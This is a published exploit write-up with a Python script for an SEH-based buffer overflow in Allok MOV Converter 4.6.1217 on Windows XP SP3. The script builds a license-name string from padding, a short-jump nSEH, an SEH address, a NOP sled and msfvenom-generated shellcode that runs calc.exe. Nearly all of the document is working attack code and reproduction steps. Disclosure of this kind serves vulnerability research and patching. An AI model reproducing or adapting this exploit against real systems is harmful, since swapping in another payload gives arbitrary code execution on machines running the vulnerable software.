# Exploit Title : Allok MOV Converter 4.6.1217 - Remote Buffer Overflow # Discovery by : Shubham Singh # Known As : Spirited Wolf [Twitter: @Pwsecspirit] # Email : spiritedwolf@protonmail.com # Youtube Channel : www.youtube.com/c/Pentestingwithspirit # Discovey Date : 29/07/2018 # Software Link : http://www.alloksoft.com/allok_movconverter.exe # Tested Version : 4.6.1217 # Tested on OS : Windows XP Service Pack 3 x86 # Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt" just copy the text inside "exploit.txt" # Start the Allok MOV Converter 4.6.1217 program and in the Lisence name paste the content of "exploit.txt" and click on Register. # You will see a sweet calculator poped up. # Greetz : @hexachordanu @FuzzySec @LiveOverflow file = open("exploit.txt","wb") junk = "\x41" * 780 nseh = "\xeb\x10\x90\x90" #Short Jump address seh = "\x79\x25\x01\x76" #0x76012579 nops = "\x90" * 16 #badchar \x00\x08\x09\x0a\x0b\x0c\x0d #msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python buf = "" buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31" buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12" buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e" buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9" buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d" buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91" buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd" buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7" buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4" buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d" buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60" buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28" buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77" buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26" buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95" buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b" buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae" more = "\x41" * 100 exploit = junk + nseh + seh + nops + buf + more file.write(exploit) file.close()